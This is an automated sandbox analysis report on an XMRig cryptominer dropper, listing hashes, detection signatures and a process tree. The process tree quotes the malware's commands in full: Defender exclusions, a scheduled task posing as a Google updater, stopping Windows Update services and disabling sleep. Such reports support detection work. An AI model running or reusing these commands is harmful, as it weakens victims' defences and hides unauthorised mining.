Analysis
- max time kernel: 149s
- max time network: 140s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 23/01/2024, 10:29
- Static task: static1
- Behavioral task: behavioral1
- Sample: file.exe
- Resource: win7-20231215-en
General
- Target: file.exe
- Size: 6.3MB
- MD5: 05a607cfc9ac7c66d4ce77dde0a2e491
- SHA1: 56101cac6a6d7484b6b131f9dfa6345a9a889423
- SHA256: 9bee594297039533caa952164d5f121d238d7c4f64cbcb7bd4b50925b66a9bee
- SHA512: 3c77fe5a61db86b232965a3e2ae6addd9790a193f55d8c5f7ca56a4b4bb7b0431869e1f897557bd6e8995be991db1a6b82c968b8e62d1072dde6816cb347d680
- SSDEEP: 98304:Eu50YoHGsu/ccnx9xKKPWCLqpcCEQFW7TlfpMarlx+yP/Vc+KOrlzfWmgGi60gMl:TMDu/f9xKWGpcR5lx1RbqSlpigy
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 2968 created 1204 | 2968 | file.exe | 14 |
| PID 2968 created 1204 | 2968 | file.exe | 14 |
| PID 2968 created 1204 | 2968 | file.exe | 14 |
| PID 2968 created 1204 | 2968 | file.exe | 14 |
| PID 2968 created 1204 | 2968 | file.exe | 14 |
| PID 1840 created 1204 | 1840 | updater.exe | 14 |
| PID 1840 created 1204 | 1840 | updater.exe | 14 |
| PID 1840 created 1204 | 1840 | updater.exe | 14 |
| PID 1840 created 1204 | 1840 | updater.exe | 14 |
| PID 1840 created 1204 | 1840 | updater.exe | 14 |
| PID 1840 created 1204 | 1840 | updater.exe | 14 |
XMRig Miner payload 11 IoCs
| resource | yara_rule |
| --- | --- |
| behavioral1/memory/2688-62-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-65-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-68-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-70-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-72-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-74-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-76-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-78-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-80-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-82-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
| behavioral1/memory/2688-84-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig |
Drops file in Drivers directory 2 IoCs
| description | ioc | Process |
| --- | --- | --- |
| File created | C:\Windows\System32\drivers\etc\hosts | file.exe |
| File created | C:\Windows\System32\drivers\etc\hosts | updater.exe |
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
| pid | Process |
| --- | --- |
| 1840 | updater.exe |
Loads dropped DLL 1 IoCs
| pid | Process |
| --- | --- |
| 2104 | taskeng.exe |
Drops file in System32 directory 4 IoCs
| description | ioc | Process |
| --- | --- | --- |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe |
Suspicious use of SetThreadContext 2 IoCs
| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 1840 set thread context of 2296 | 1840 | updater.exe | 57 |
| PID 1840 set thread context of 2688 | 1840 | updater.exe | 60 |
Drops file in Program Files directory 2 IoCs
| description | ioc | Process |
| --- | --- | --- |
| File created | C:\Program Files\Google\Chrome\updater.exe | file.exe |
| File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe |
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.

| pid | Process |
| --- | --- |
| 2208 | sc.exe |
| 2932 | sc.exe |
| 2160 | sc.exe |
| 2896 | sc.exe |
| 2808 | sc.exe |
| 1556 | sc.exe |
| 1852 | sc.exe |
| 2828 | sc.exe |
| 2748 | sc.exe |
| 2840 | sc.exe |
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
| pid | Process |
| --- | --- |
| 2656 | schtasks.exe |
| 2532 | schtasks.exe |
Modifies data under HKEY_USERS 2 IoCs
| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0aae013e74dda01 | powershell.exe |
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 14 IoCs
| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 1196 | powershell.exe |
| Token: SeShutdownPrivilege | 2772 | powercfg.exe |
| Token: SeShutdownPrivilege | 2892 | powercfg.exe |
| Token: SeShutdownPrivilege | 2704 | powercfg.exe |
| Token: SeDebugPrivilege | 2916 | powershell.exe |
| Token: SeShutdownPrivilege | 2608 | powercfg.exe |
| Token: SeDebugPrivilege | 2152 | powershell.exe |
| Token: SeShutdownPrivilege | 1396 | powercfg.exe |
| Token: SeShutdownPrivilege | 1168 | powercfg.exe |
| Token: SeDebugPrivilege | 844 | powershell.exe |
| Token: SeShutdownPrivilege | 2456 | powercfg.exe |
| Token: SeShutdownPrivilege | 2412 | powercfg.exe |
| Token: SeDebugPrivilege | 1840 | updater.exe |
| Token: SeLockMemoryPrivilege | 2688 | explorer.exe |
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2788
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:844
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1572
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:892
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
C:\Windows\system32\taskeng.exetaskeng.exe {206BD7AC-24D6-46C3-BD1D-D24E4982DD60} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
PID:2656
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
C:\Windows\System32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:2828
-
C:\Windows\System32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:2748
-
C:\Windows\System32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:2932
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:2840
-
C:\Windows\System32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
PID:2808
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
PID:2532
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
C:\Windows\System32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:1556
-
C:\Windows\System32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:2160
-
C:\Windows\System32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:2896
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:1852
-
C:\Windows\System32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
PID:2208
Network
MITRE ATT&CK Enterprise v15
Downloads